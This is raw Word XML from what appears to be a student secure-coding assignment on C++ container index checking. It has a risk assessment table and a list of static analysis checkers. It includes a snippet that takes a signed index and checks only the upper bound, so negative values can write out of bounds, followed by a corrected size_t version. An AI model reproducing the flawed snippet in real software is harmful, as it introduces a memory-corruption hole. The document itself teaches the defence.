              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>insert_in_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>int *table, std::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tableSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, int pos, int value) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="105ABED7" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t xml:space="preserve">  if (pos &gt;= </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tableSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0457E778" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t xml:space="preserve">    // Handle error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B57A443" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>return;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="2C4564A0" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D321022" w14:textId="77777777" w:rsidR="00FB6591" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t xml:space="preserve">  table[pos] = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>value;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6BD9F1DC" w14:textId="04A1E988" w:rsidR="00F72634" w:rsidRDefault="00FB6591" w:rsidP="00FB6591">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FFF2133"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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084B059" w:rsidR="00F72634" w:rsidRDefault="00016D32" w:rsidP="00A72503">
            <w:r w:rsidRPr="00016D32">
              <w:t xml:space="preserve">In this compliant solution, the parameter pos is declared as </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00016D32">
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00016D32">
              <w:t>, which prevents the passing of negative arguments.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="66F887A3" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="526639FE" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cstddef</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CB9E37" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C816EC2" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>insert_in_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>table</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>int *table, std::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tableSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, std::</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>size_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> pos, int value) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C82ECF4" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">  if (pos &gt;= </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tableSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C93CBB" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">    // Handle error</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="242BC7F3" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>return;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="3EA26BFA" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78152039" w14:textId="77777777" w:rsidR="00016D32" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t xml:space="preserve">  table[pos] = </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>value;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="09D5B7CA" w14:textId="5D8212B5" w:rsidR="00F72634" w:rsidRDefault="00016D32" w:rsidP="00016D32">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67786E73" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123223BF" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Int_KyC2JOC2"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>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5A2B69F" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="009A5D3E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> 3.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008F26AE">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Architect and Design for Security Policies</w:t>
            </w:r>
            <w:r w:rsidR="008F26AE">
              <w:t>: This principle underscores the importance of integrating security into the design and architecture of software. Ensuring that container indices and iterators are properly checked against valid ranges is a fundamental aspect of designing robust and secure software systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2892146E" w14:textId="6A390CE0" w:rsidR="00F00721" w:rsidRDefault="00F00721" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Principle 5: Default Deny</w:t>
            </w:r>
            <w:r>
              <w:t>. This standard ensures strict boundaries, thereby preventing unauthorized or unintended access to resources within a container.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B71C6F9" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06EB4183" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D591C48" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E9ECE7F" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D64BDE5" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4CD5D946" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="7149F2C7" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="087DC360" w14:textId="5E9064F7" w:rsidR="00381847" w:rsidRDefault="001A351E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBCF7D7" w14:textId="1E03F836" w:rsidR="00381847" w:rsidRDefault="001A351E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7CD542" w14:textId="66546856" w:rsidR="00381847" w:rsidRDefault="009529EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0E433A" w14:textId="30FFCE0E" w:rsidR="00381847" w:rsidRDefault="009529EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61360AD2" w14:textId="562F4841" w:rsidR="00381847" w:rsidRDefault="009529EA">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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="143EC026" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="465E3EFB" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28A30079" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="408ABCDD" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="171C80A2" w14:textId="529101B4" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId144" w:history="1">
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B7F8B30" w14:textId="05F6F0C2" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270B7D17" w14:textId="3D660404" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>overflow_upon_dereference</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ECAAE39" w14:textId="0DB4E6FF" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="0BE86323" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="257C4360" w14:textId="767BDE32" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId145" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B319297" w14:textId="1673D267" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D18718" w14:textId="71A1480B" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">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LANG.MEM.BU</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LANG.MEM.TU</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.MEM.TBA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.PBB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.PPE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.PARITH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C386E33" w14:textId="1BA0E5A0" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Buffer overrun</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Buffer underrun</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Type overrun</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Type underrun</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Tainted buffer access</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Pointer before beginning of object</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Pointer past end of object</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Pointer Arithmetic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D601A" w14:paraId="714F056F" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D2FE990" w14:textId="3FD41CBF" w:rsidR="000D601A" w:rsidRDefault="00000000" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId146" w:history="1">
              <w:r w:rsidR="000D601A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62202DD3" w14:textId="3938EBED" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72302FD0" w14:textId="77777777" w:rsidR="000D601A" w:rsidRDefault="000D601A" w:rsidP="000D601A">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C++3139, C++3140</w:t>
            </w:r>
          </w:p>
